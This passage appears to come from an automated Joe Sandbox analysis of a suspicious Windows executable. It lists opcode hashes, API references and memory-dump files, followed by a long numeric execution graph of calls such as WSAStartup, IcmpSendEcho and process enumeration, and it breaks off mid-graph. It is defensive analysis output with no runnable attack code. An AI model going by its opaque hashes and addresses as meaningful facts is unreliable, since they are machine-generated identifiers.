                                                                                                                                                                                                                                                                                    • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                    • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                                    • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                    • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                    Execution Coverage:3.4%
                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                    Signature Coverage:2.9%
                                                                                                                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:50
                                                                                                                                                                                                                                                                                    execution_graph 104527 b35650 104536 afe3d5 104527->104536 104529 b35666 104531 b356e1 104529->104531 104545 afaa65 9 API calls 104529->104545 104534 b361d7 104531->104534 104547 b53fe1 81 API calls __wsopen_s 104531->104547 104533 b356c1 104533->104531 104546 b5247e 8 API calls 104533->104546 104537 afe3f6 104536->104537 104538 afe3e3 104536->104538 104539 afe3fb 104537->104539 104540 afe429 104537->104540 104548 aeb4c8 8 API calls 104538->104548 104542 b0014b 8 API calls 104539->104542 104549 aeb4c8 8 API calls 104540->104549 104544 afe3ed 104542->104544 104544->104529 104545->104533 104546->104531 104547->104534 104548->104544 104549->104544 104550 aeda4a 104551 aeda54 104550->104551 104560 aedbc4 104550->104560 104552 aecf80 39 API calls 104551->104552 104551->104560 104553 aedace 104552->104553 104554 b0014b 8 API calls 104553->104554 104555 aedae7 104554->104555 104556 b0017b 8 API calls 104555->104556 104557 aedb05 104556->104557 104558 b0014b 8 API calls 104557->104558 104561 aedb16 __fread_nolock 104558->104561 104559 b0014b 8 API calls 104563 aedb7f 104559->104563 104562 b0017b 8 API calls 104560->104562 104565 aed5e1 104560->104565 104567 aedc19 104560->104567 104561->104559 104561->104560 104562->104560 104563->104560 104564 aecf80 39 API calls 104563->104564 104564->104560 104566 b0014b 8 API calls 104565->104566 104573 aed66e messages 104566->104573 104568 aec3ab 8 API calls 104578 aed9ac messages 104568->104578 104569 aebed9 8 API calls 104569->104573 104572 b31f79 104582 b456ae 8 API calls messages 104572->104582 104573->104569 104573->104572 104574 b31f94 104573->104574 104576 aec3ab 8 API calls 104573->104576 104577 aed911 messages 104573->104577 104581 aeb4c8 8 API calls 104573->104581 104576->104573 104577->104568 104577->104578 104579 aed9c3 104578->104579 104580 afe30a 8 API calls messages 104578->104580 104580->104578 104581->104573 104582->104574 104583 b36555 104584 b0014b 8 API calls 104583->104584 104585 b3655c 104584->104585 104586 b36575 __fread_nolock 104585->104586 104587 b0017b 8 API calls 104585->104587 104588 b0017b 8 API calls 104586->104588 104587->104586 104589 b3659a 104588->104589 104590 ae1044 104595 ae2793 104590->104595 104592 ae104a 104631 b00413 29 API calls __onexit 104592->104631 104594 ae1054 104632 ae2a38 104595->104632 104599 ae280a 104600 aebf73 8 API calls 104599->104600 104601 ae2814 104600->104601 104602 aebf73 8 API calls 104601->104602 104603 ae281e 104602->104603 104604 aebf73 8 API calls 104603->104604 104605 ae2828 104604->104605 104606 aebf73 8 API calls 104605->104606 104607 ae2866 104606->104607 104608 aebf73 8 API calls 104607->104608 104609 ae2932 104608->104609 104642 ae2dbc 104609->104642 104613 ae2964 104614 aebf73 8 API calls 104613->104614 104615 ae296e 104614->104615 104616 af3160 9 API calls 104615->104616 104617 ae2999 104616->104617 104669 ae3166 104617->104669 104619 ae29b5 104620 ae29c5 GetStdHandle 104619->104620 104621 ae2a1a 104620->104621 104622 b239e7 104620->104622 104625 ae2a27 OleInitialize 104621->104625 104622->104621 104623 b239f0 104622->104623 104624 b0014b 8 API calls 104623->104624 104626 b239f7 104624->104626 104625->104592 104676 b50ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 104626->104676 104628 b23a00 104677 b512eb CreateThread 104628->104677 104630 b23a0c CloseHandle 104630->104621 104631->104594 104678 ae2a91 104632->104678 104635 ae2a91 8 API calls 104636 ae2a70 104635->104636 104637 aebf73 8 API calls 104636->104637 104638 ae2a7c 104637->104638 104639 ae8577 8 API calls 104638->104639 104640 ae27c9 104639->104640 104641 ae327e 6 API calls 104640->104641 104641->104599 104643 aebf73 8 API calls 104642->104643 104644 ae2dcc 104643->104644 104645 aebf73 8 API calls 104644->104645 104646 ae2dd4 104645->104646 104685 ae81d6 104646->104685 104649 ae81d6 8 API calls 104650 ae2de4 104649->104650 104651 aebf73 8 API calls 104650->104651 104652 ae2def 104651->104652 104653 b0014b 8 API calls 104652->104653 104654 ae293c 104653->104654 104655 ae3205 104654->104655 104656 ae3213 104655->104656 104657 aebf73 8 API calls 104656->104657 104658 ae321e 104657->104658 104659 aebf73 8 API calls 104658->104659 104660 ae3229 104659->104660 104661 aebf73 8 API calls 104660->104661 104662 ae3234 104661->104662 104663 aebf73 8 API calls 104662->104663 104664 ae323f 104663->104664 104665 ae81d6 8 API calls 104664->104665 104666 ae324a 104665->104666 104667 b0014b 8 API calls 104666->104667 104668 ae3251 RegisterWindowMessageW 104667->104668 104668->104613 104670 ae3176 104669->104670 104671 b23c8f 104669->104671 104672 b0014b 8 API calls 104670->104672 104688 b53c4e 8 API calls 104671->104688 104675 ae317e 104672->104675 104674 b23c9a 104675->104619 104676->104628 104677->104630 104689 b512d1 14 API calls 104677->104689 104679 aebf73 8 API calls 104678->104679 104680 ae2a9c 104679->104680 104681 aebf73 8 API calls 104680->104681 104682 ae2aa4 104681->104682 104683 aebf73 8 API calls 104682->104683 104684 ae2a66 104683->104684 104684->104635 104686 aebf73 8 API calls 104685->104686 104687 ae2ddc 104686->104687 104687->104649 104688->104674 102005 b1947a 102006 b19487 102005->102006 102010 b1949f 102005->102010 102062 b0f649 20 API calls _free 102006->102062 102008 b1948c 102063 b12b5c 26 API calls _strftime 102008->102063 102011 b194fa 102010->102011 102019 b19497 102010->102019 102064 b20144 21 API calls 2 library calls 102010->102064 102025 b0dcc5 102011->102025 102014 b19512 102032 b18fb2 102014->102032 102016 b19519 102017 b0dcc5 __fread_nolock 26 API calls 102016->102017 102016->102019 102018 b19545 102017->102018 102018->102019 102020 b0dcc5 __fread_nolock 26 API calls 102018->102020 102021 b19553 102020->102021 102021->102019 102022 b0dcc5 __fread_nolock 26 API calls 102021->102022 102023 b19563 102022->102023 102024 b0dcc5 __fread_nolock 26 API calls 102023->102024 102024->102019 102026 b0dcd1 102025->102026 102027 b0dce6 102025->102027 102065 b0f649 20 API calls _free 102026->102065 102027->102014 102029 b0dcd6 102066 b12b5c 26 API calls _strftime 102029->102066 102031 b0dce1 102031->102014 102033 b18fbe ___DestructExceptionObject 102032->102033 102034 b18fc6 102033->102034 102038 b18fde 102033->102038 102133 b0f636 20 API calls _free 102034->102133 102036 b190a4 102140 b0f636 20 API calls _free 102036->102140 102037 b18fcb 102134 b0f649 20 API calls _free 102037->102134 102038->102036 102041 b19017 102038->102041 102043 b19026 102041->102043 102044 b1903b 102041->102044 102042 b190a9 102141 b0f649 20 API calls _free 102042->102141 102135 b0f636 20 API calls _free 102043->102135 102067 b154ba EnterCriticalSection 102044->102067 102046 b19033 102142 b12b5c 26 API calls _strftime 102046->102142 102049 b19041 102051 b19072 102049->102051 102052 b1905d 102049->102052 102050 b1902b 102136 b0f649 20 API calls _free 102050->102136 102068 b190c5 102051->102068 102137 b0f649 20 API calls _free 102052->102137 102054 b18fd3 __wsopen_s 102054->102016 102058 b19062 102138 b0f636 20 API calls _free 102058->102138 102059 b1906d 102139 b1909c LeaveCriticalSection __wsopen_s 102059->102139 102062->102008 102063->102019 102064->102011 102065->102029 102066->102031 102067->102049 102069 b190d7 102068->102069 102070 b190ef 102068->102070 102159 b0f636 20 API calls _free 102069->102159 102072 b19459 102070->102072 102077 b19134 102070->102077 102182 b0f636 20 API calls _free 102072->102182 102073 b190dc 102160 b0f649 20 API calls _free 102073->102160 102076 b1945e 102183 b0f649 20 API calls _free 102076->102183 102079 b1913f 102077->102079 102080 b190e4 102077->102080 102085 b1916f 102077->102085 102161 b0f636 20 API calls _free 102079->102161 102080->102059 102081 b1914c 102184 b12b5c 26 API calls _strftime 102081->102184 102083 b19144 102162 b0f649 20 API calls _free 102083->102162 102087 b19188 102085->102087 102088 b191ca 102085->102088 102089 b191ae 102085->102089 102087->102089 102093 b19195 102087->102093 102143 b13b93 102088->102143 102163 b0f636 20 API calls _free 102089->102163 102092 b191b3 102164 b0f649 20 API calls _free 102092->102164 102150 b1fc1b 102093->102150 102098 b19333 102100 b193a9 102098->102100 102103 b1934c GetConsoleMode 102098->102103 102099 b191ba 102165 b12b5c 26 API calls _strftime 102099->102165 102106 b193ad ReadFile 102100->102106 102102 b191ea 102105 b12d38 _free 20 API calls 102102->102105 102103->102100 102107 b1935d 102103->102107 102104 b191c5 __fread_nolock 102120 b12d38 _free 20 API calls 102104->102120 102108 b191f1 102105->102108 102109 b19421 GetLastError 102106->102109 102110 b193c7 102106->102110 102107->102106 102112 b19363 ReadConsoleW 102107->102112 102113 b19216 102108->102113 102114 b191fb 102108->102114 102115 b19385 102109->102115 102116 b1942e 102109->102116 102110->102109 102111 b1939e 102110->102111 102111->102104 102126 b19403 102111->102126 102127 b193ec 102111->102127 102112->102111 102119 b1937f GetLastError 102112->102119 102174 b197a4 102113->102174 102172 b0f649 20 API calls _free 102114->102172 102115->102104 102177 b0f613 20 API calls 2 library calls 102115->102177 102180 b0f649 20 API calls _free 102116->102180 102119->102115 102120->102080 102122 b19433 102181 b0f636 20 API calls _free 102122->102181 102124 b19200 102173 b0f636 20 API calls _free 102124->102173 102126->102104 102130 b1941a 102126->102130 102178 b18de1 31 API calls 4 library calls 102127->102178 102179 b18c21 29 API calls __wsopen_s 102130->102179 102132 b1941f 102132->102104 102133->102037 102134->102054 102135->102050 102136->102046 102137->102058 102138->102059 102139->102054 102140->102042 102141->102046 102142->102054 102144 b13bd1 102143->102144 102148 b13ba1 _free 102143->102148 102186 b0f649 20 API calls _free 102144->102186 102145 b13bbc RtlAllocateHeap 102147 b13bcf 102145->102147 102145->102148 102166 b12d38 102147->102166 102148->102144 102148->102145 102185 b0521d 7 API calls 2 library calls 102148->102185 102151 b1fc35 102150->102151 102152 b1fc28 102150->102152 102155 b1fc41 102151->102155 102188 b0f649 20 API calls _free 102151->102188 102187 b0f649 20 API calls _free 102152->102187 102154 b1fc2d 102154->102098 102155->102098 102157 b1fc62 102189 b12b5c 26 API calls _strftime 102157->102189 102159->102073 102160->102080 102161->102083 102162->102081 102163->102092 102164->102099 102165->102104 102167 b12d43 RtlFreeHeap 102166->102167 102171 b12d6c _free 102166->102171 102168 b12d58 102167->102168 102167->102171 102190 b0f649 20 API calls _free 102168->102190 102170 b12d5e GetLastError 102170->102171 102171->102102 102172->102124 102173->102104 102191 b1970b 102174->102191 102177->102104 102178->102104 102179->102132 102180->102122 102181->102104 102182->102076 102183->102081 102184->102080 102185->102148 102186->102147 102187->102154 102188->102157 102189->102154 102190->102170 102200 b15737 102191->102200 102193 b1971d 102194 b19725 102193->102194 102195 b19736 SetFilePointerEx 102193->102195 102213 b0f649 20 API calls _free 102194->102213 102197 b1974e GetLastError 102195->102197 102199 b1972a 102195->102199 102214 b0f613 20 API calls 2 library calls 102197->102214 102199->102093 102201 b15744 102200->102201 102202 b15759 102200->102202 102215 b0f636 20 API calls _free 102201->102215 102207 b1577e 102202->102207 102217 b0f636 20 API calls _free 102202->102217 102205 b15749 102216 b0f649 20 API calls _free 102205->102216 102207->102193 102208 b15789 102218 b0f649 20 API calls _free 102208->102218 102209 b15751 102209->102193 102211 b15791 102219 b12b5c 26 API calls _strftime 102211->102219 102213->102199 102214->102199 102215->102205 102216->102209 102217->102208 102218->102211 102219->102209 102220 aef5e5 102223 aecab0 102220->102223 102224 aecacb 102223->102224 102225 b314be 102224->102225 102226 b3150c 102224->102226 102252 aecaf0 102224->102252 102229 b314c8 102225->102229 102232 b314d5 102225->102232 102225->102252 102295 b662ff 207 API calls 2 library calls 102226->102295 102293 b66790 207 API calls 102229->102293 102249 aecdc0 102232->102249 102294 b66c2d 207 API calls 2 library calls 102232->102294 102235 b3179f 102235->102235 102239 b316e8 102302 b66669 81 API calls 102239->102302 102243 aecdee 102247 afe807 39 API calls 102247->102252 102248 aecf80 39 API calls 102248->102252 102249->102243 102303 b53fe1 81 API calls __wsopen_s 102249->102303 102252->102239 102252->102243 102252->102247 102252->102248 102252->102249 102254 af0340 102252->102254 102277 aebe2d 102252->102277 102281 afe7c1 39 API calls 102252->102281 102282 afaa99 207 API calls 102252->102282 102283 b005b2 5 API calls __Init_thread_wait 102252->102283 102284 afbc58 102252->102284 102289 b00413 29 API calls __onexit 102252->102289 102290 b00568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102252->102290 102291 aff4df 81 API calls 102252->102291 102292 aff346 207 API calls 102252->102292 102296 aeb4c8 8 API calls 102252->102296 102297 b3ffaf 8 API calls 102252->102297 102298 aebed9 102252->102298 102272 af0376 messages 102254->102272 102255 b005b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 102255->102272 102256 b00568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 102256->102272 102257 b3632b 102379 b53fe1 81 API calls __wsopen_s 102257->102379 102259 af1695 102265 aebed9 8 API calls 102259->102265 102271 af049d messages 102259->102271 102261 b0014b 8 API calls 102261->102272 102262 aebed9 8 API calls 102262->102272 102263 b35cdb 102269 aebed9 8 API calls 102263->102269 102263->102271 102264 b3625a 102378 b53fe1 81 API calls __wsopen_s 102264->102378 102265->102271 102269->102271 102270 aebf73 8 API calls 102270->102272 102271->102252 102272->102255 102272->102256 102272->102257 102272->102259 102272->102261 102272->102262 102272->102263 102272->102264 102272->102270 102272->102271 102273 b00413 29 API calls pre_c_initialization 102272->102273 102274 b36115 102272->102274 102276 af0aae messages 102272->102276 102304 af1990 102272->102304 102366 af1e50 102272->102366 102273->102272 102376 b53fe1 81 API calls __wsopen_s 102274->102376 102377 b53fe1 81 API calls __wsopen_s 102276->102377 102278 aebe38 102277->102278 102279 aebe67 102278->102279 103291 aebfa5 102278->103291 102279->102252 102281->102252 102282->102252 102283->102252 102285 b0014b 8 API calls 102284->102285 102286 afbc65 102285->102286 102287 aeb329 8 API calls 102286->102287 102288 afbc70 102287->102288 102288->102252 102289->102252 102290->102252 102291->102252 102292->102252 102293->102232 102294->102249 102295->102252 102296->102252 102297->102252 102299 aebefc __fread_nolock 102298->102299 102300 aebeed 102298->102300 102299->102252 102300->102299 102301 b0017b 8 API calls 102300->102301 102301->102299 102302->102249 102303->102235 102305 af1a2e 102304->102305 102306 af19b6 102304->102306 102309 b36a4d 102305->102309 102317 af1a3d 102305->102317 102307 b36b60 102306->102307 102308 af19c3 102306->102308 102386 b685db 207 API calls 2 library calls 102307->102386 102318 b36b84 102308->102318 102319 af19cd 102308->102319 102311 b36b54 102309->102311 102312 b36a58 102309->102312 102385 b53fe1 81 API calls __wsopen_s 102311->102385 102384 afb35c 207 API calls 102312->102384 102313 af0340 207 API calls 102313->102317 102316 b36bb5 102320 b36be2 102316->102320 102321 b36bc0 102316->102321 102317->102313 102322 b36979 102317->102322 102325 af1ba9 102317->102325 102326 af1bb5 102317->102326 102331 b36908 102317->102331 102348 af1af4 102317->102348 102365 af19e0 messages 102317->102365 102318->102316 102328 b36b9c 102318->102328 102327 aebed9 8 API calls 102319->102327 102319->102365 102389 b660e6 102320->102389 102388 b685db 207 API calls 2 library calls 102321->102388 102383 b53fe1 81 API calls __wsopen_s 102322->102383 102325->102326 102381 b53fe1 81 API calls __wsopen_s 102325->102381 102326->102272 102327->102365 102387 b53fe1 81 API calls __wsopen_s 102328->102387 102329 b36dd9 102337 b36e0f 102329->102337 102488 b681ce 65 API calls 102329->102488 102382 b53fe1 81 API calls __wsopen_s 102331->102382 102335 b36c81 102461 b51ad8 8 API calls 102335->102461 102490 aeb4c8 8 API calls 102337->102490 102338 b36db7 102464 ae8ec0 102338->102464 102341 aebed9 8 API calls 102341->102365 102343 b36ded 102345 ae8ec0 52 API calls 102343->102345 102344 b36c08 102396 b5148b 102344->102396 102361 b36df5 _wcslen 102345->102361 102348->102325 102380 af1ca0 8 API calls 102348->102380 102350 b36c93 102462 aebd07 8 API calls 102350->102462 102351 b3691d messages 102351->102322 102360 af1b62 messages 102351->102360 102363 af1a23 messages 102351->102363 102353 af1b55 102353->102325 102353->102360 102355 b36dbf _wcslen 102355->102329 102487 aeb4c8 8 API calls 102355->102487 102357 b36c9c 102364 b5148b 8 API calls 102357->102364 102360->102341 102360->102363 102360->102365 102361->102337 102489 aeb4c8 8 API calls 102361->102489 102363->102272 102364->102365 102365->102329 102365->102363 102463 b6808f 53 API calls __wsopen_s 102365->102463 102373 af1e6d messages 102366->102373 102368 af2512 102372 af1ff7 messages 102368->102372 103290 afbe08 39 API calls 102368->103290 102370 b37837 102370->102372 103289 b0d2d5 39 API calls 102370->103289 102372->102272 102373->102368 102373->102370 102373->102372 102375 b3766b 102373->102375 103288 afe322 8 API calls messages 102373->103288 103287 b0d2d5 39 API calls 102375->103287 102376->102276 102377->102271 102378->102271 102379->102271 102380->102353 102381->102363 102382->102351 102383->102365 102384->102360 102385->102307 102386->102365 102387->102363 102388->102365 102390 b36bed 102389->102390 102391 b66101 102389->102391 102390->102335 102390->102344 102491 b0017b 102391->102491 102394 b66123 102394->102390 102500 b0014b 102394->102500 102509 b51400 8 API calls 102394->102509 102397 b51499 102396->102397 102399 b36c32 102396->102399 102398 b0014b 8 API calls 102397->102398 102397->102399 102398->102399 102400 af2b20 102399->102400 102401 af2b61 102400->102401 102402 af2b86 102401->102402 102403 af2fc0 102401->102403 102404 b37bd8 102402->102404 102405 af2ba0 102402->102405 102731 b005b2 5 API calls __Init_thread_wait 102403->102731 102694 b67af9 102404->102694 102516 af3160 102405->102516 102409 af2fca 102412 af300b 102409->102412 102732 aeb329 102409->102732 102411 b37be4 102411->102365 102416 b37bed 102412->102416 102418 af303c 102412->102418 102413 af3160 9 API calls 102415 af2bc6 102413->102415 102415->102412 102417 af2bfc 102415->102417 102742 b53fe1 81 API calls __wsopen_s 102416->102742 102417->102416 102431 af2c18 __fread_nolock 102417->102431 102739 aeb4c8 8 API calls 102418->102739 102421 af3049 102740 afe6e8 207 API calls 102421->102740 102422 af2fe4 102738 b00568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102422->102738 102424 b37c15 102743 b53fe1 81 API calls __wsopen_s 102424->102743 102427 af2d4c 102429 af3160 9 API calls 102427->102429 102428 b37c78 102745 b661a2 53 API calls _wcslen 102428->102745 102432 af2d59 102429->102432 102431->102421 102431->102424 102433 b0014b 8 API calls 102431->102433 102435 b0017b 8 API calls 102431->102435 102440 af0340 207 API calls 102431->102440 102442 af2d3f 102431->102442 102443 b37c59 102431->102443 102449 af2dd7 messages 102431->102449 102438 af3160 9 API calls 102432->102438 102432->102449 102433->102431 102434 af3082 102741 affe39 8 API calls 102434->102741 102435->102431 102437 af2f2d 102437->102365 102447 af2d73 102438->102447 102440->102431 102441 af2e8b messages 102441->102437 102730 afe322 8 API calls messages 102441->102730 102442->102427 102442->102428 102744 b53fe1 81 API calls __wsopen_s 102443->102744 102444 af3160 9 API calls 102444->102449 102448 aebed9 8 API calls 102447->102448 102447->102449 102448->102449 102449->102434 102449->102441 102449->102444 102526 b60fb8 102449->102526 102551 b5f94a 102449->102551 102560 b6a9ac 102449->102560 102568 b69fe8 102449->102568 102571 afac3e 102449->102571 102590 b6ad47 102449->102590 102595 ae8bda 102449->102595 102670 b6a5b2 102449->102670 102676 b5664c 102449->102676 102683 b6a6aa 102449->102683 102691 b69ffc 102449->102691 102746 b53fe1 81 API calls __wsopen_s 102449->102746 102461->102350 102462->102357 102463->102338 102465 ae8ed5 102464->102465 102466 ae8ed2 102464->102466 102467 ae8edd 102465->102467 102468 ae8f0b 102465->102468 102466->102355 103283 b05536 26 API calls 102467->103283 102470 b26b1f 102468->102470 102471 ae8f1d 102468->102471 102478 b26a38 102468->102478 103286 b054f3 26 API calls 102470->103286 103284 affe6f 51 API calls 102471->103284 102472 ae8eed 102477 b0014b 8 API calls 102472->102477 102475 b26b37 102475->102475 102479 ae8ef7 102477->102479 102481 b0017b 8 API calls 102478->102481 102486 b26ab1 102478->102486 102480 aeb329 8 API calls 102479->102480 102480->102466 102483 b26a81 102481->102483 102482 b0014b 8 API calls 102484 b26aa8 102482->102484 102483->102482 102485 aeb329 8 API calls 102484->102485 102485->102486 103285 affe6f 51 API calls 102486->103285 102487->102329 102488->102343 102489->102337 102490->102363 102492 b0014b ___std_exception_copy 102491->102492 102493 b0016a 102492->102493 102496 b0016c 102492->102496 102510 b0521d 7 API calls 2 library calls 102492->102510 102493->102394 102495 b009dd 102512 b03614 RaiseException 102495->102512 102496->102495 102511 b03614 RaiseException 102496->102511 102498 b009fa 102498->102394 102501 b00150 ___std_exception_copy 102500->102501 102502 b0016a 102501->102502 102504 b0016c 102501->102504 102513 b0521d 7 API calls 2 library calls 102501->102513 102502->102394 102505 b009dd 102504->102505 102514 b03614 RaiseException 102504->102514 102515 b03614 RaiseException 102505->102515 102507 b009fa 102507->102394 102509->102394 102510->102492 102511->102495 102512->102498 102513->102501 102514->102505 102515->102507 102517 af31a1 102516->102517 102524 af317d 102516->102524 102747 b005b2 5 API calls __Init_thread_wait 102517->102747 102518 af2bb0 102518->102413 102520 af31ab 102520->102524 102748 b00568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102520->102748 102522 af9f47 102522->102518 102750 b00568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102522->102750 102524->102518 102749 b005b2 5 API calls __Init_thread_wait 102524->102749 102527 b60fe1 102526->102527 102528 b6100f WSAStartup 102527->102528 102764 aec98d 102527->102764 102529 b61054 102528->102529 102550 b61023 messages 102528->102550 102751 afc1f6 102529->102751 102532 b60ffc 102532->102528 102535 aec98d 39 API calls 102532->102535 102534 ae8ec0 52 API calls 102536 b61069 102534->102536 102537 b6100b 102535->102537 102756 aff9d4 WideCharToMultiByte 102536->102756 102537->102528 102539 b61075 inet_addr gethostbyname 102540 b61093 IcmpCreateFile 102539->102540 102539->102550 102541 b610d3 102540->102541 102540->102550 102542 b0017b 8 API calls 102541->102542 102543 b610ec 102542->102543 102769 ae423c 102543->102769 102546 b61102 IcmpSendEcho 102549 b6114c 102546->102549 102547 b6112b IcmpSendEcho 102547->102549 102548 b61212 IcmpCloseHandle WSACleanup 102548->102550 102549->102548 102550->102449 102552 b0017b 8 API calls 102551->102552 102553 b5f95b 102552->102553 102554 ae423c 8 API calls 102553->102554 102555 b5f965 102554->102555 102556 ae8ec0 52 API calls 102555->102556 102557 b5f97c GetEnvironmentVariableW 102556->102557 102775 b5160f 8 API calls 102557->102775 102559 b5f999 messages 102559->102449 102561 b6aa08 102560->102561 102567 b6a9c8 102560->102567 102562 b6aa26 102561->102562 102563 aec98d 39 API calls 102561->102563 102564 aec98d 39 API calls 102562->102564 102565 b6aa8e 102562->102565 102562->102567 102563->102562 102564->102565 102776 b50372 102565->102776 102567->102449 102847 b689b6 102568->102847 102570 b69ff8 102570->102449 102572 ae8ec0 52 API calls 102571->102572 102573 afac68 102572->102573 102574 afbc58 8 API calls 102573->102574 102575 afac7f 102574->102575 102576 aec98d 39 API calls 102575->102576 102586 afb09b _wcslen 102575->102586 102576->102586 102577 b04d98 _strftime 40 API calls 102577->102586 102578 afbbbe 43 API calls 102578->102586 102580 ae6c03 8 API calls 102580->102586 102583 afb1fb 102583->102449 102584 aec98d 39 API calls 102584->102586 102585 ae8ec0 52 API calls 102585->102586 102586->102577 102586->102578 102586->102580 102586->102583 102586->102584 102586->102585 102988 ae396b 102586->102988 102998 ae3907 102586->102998 103002 ae7ad5 102586->103002 103007 aead40 8 API calls __fread_nolock 102586->103007 103008 ae7b1a 8 API calls 102586->103008 103009 ae8577 102586->103009 102591 ae8ec0 52 API calls 102590->102591 102592 b6ad63 102591->102592 103103 b4dd87 CreateToolhelp32Snapshot Process32FirstW 102592->103103 102594 b6ad72 102594->102449 102596 ae8ec0 52 API calls 102595->102596 102597 ae8bf9 102596->102597 102598 ae8ec0 52 API calls 102597->102598 102599 ae8c0e 102598->102599 102600 ae8ec0 52 API calls 102599->102600 102601 ae8c21 102600->102601 102602 ae8ec0 52 API calls 102601->102602 102603 ae8c37 102602->102603 102604 ae7ad5 8 API calls 102603->102604 102605 ae8c4b 102604->102605 102606 b26767 102605->102606 102607 aec98d 39 API calls 102605->102607 102609 ae7e12 8 API calls 102606->102609 102608 ae8c72 102607->102608 102608->102606 102635 ae8c98 try_get_first_available_module 102608->102635 102610 b26786 102609->102610 102611 ae8470 8 API calls 102610->102611 102612 b26798 102611->102612 102617 ae8a60 8 API calls 102612->102617 102644 b267bd 102612->102644 102613 ae7e12 8 API calls 102614 ae8d4e 102613->102614 102618 b26873 102614->102618 102619 ae8d5c 102614->102619 102615 ae8d3c 102615->102613 102616 ae8ec0 52 API calls 102621 ae8d27 102616->102621 102617->102644 102625 b268bc 102618->102625 102626 b2687d 102618->102626 102623 b2696e 102619->102623 102624 ae8d71 102619->102624 102627 ae8ec0 52 API calls 102621->102627 102622 ae8e71 102622->102449 102631 ae8470 8 API calls 102623->102631 102629 ae8470 8 API calls 102624->102629 102628 ae8470 8 API calls 102625->102628 102632 ae8470 8 API calls 102626->102632 102627->102615 102633 b268c5 102628->102633 102634 ae8d79 102629->102634 102630 ae893c 8 API calls 102630->102644 102636 b2697b 102631->102636 102637 b26885 102632->102637 102638 ae8a60 8 API calls 102633->102638 102639 aebd57 8 API calls 102634->102639 102635->102615 102635->102616 102663 ae8d91 try_get_first_available_module 102635->102663 102641 ae8a60 8 API calls 102636->102641 102642 ae8ec0 52 API calls 102637->102642 102643 b268e1 102638->102643 102639->102663 102640 ae8a60 8 API calls 102640->102644 102641->102663 102645 b26897 102642->102645 102650 ae8ec0 52 API calls 102643->102650 102644->102622 102644->102630 102644->102640 103189 ae8844 8 API calls __fread_nolock 102644->103189 103190 ae8844 8 API calls __fread_nolock 102645->103190 102648 b268ab 102649 ae893c 8 API calls 102648->102649 102651 b268b9 102649->102651 102653 b268fc 102650->102653 102657 ae8a60 8 API calls 102651->102657 103191 ae8844 8 API calls __fread_nolock 102653->103191 102654 b269f1 102660 ae893c 8 API calls 102654->102660 102655 b269c1 102655->102654 102658 b269e5 102655->102658 102657->102622 103192 aead40 8 API calls __fread_nolock 102658->103192 102664 b269ff 102660->102664 102661 b26910 102665 ae893c 8 API calls 102661->102665 102663->102622 102663->102655 103174 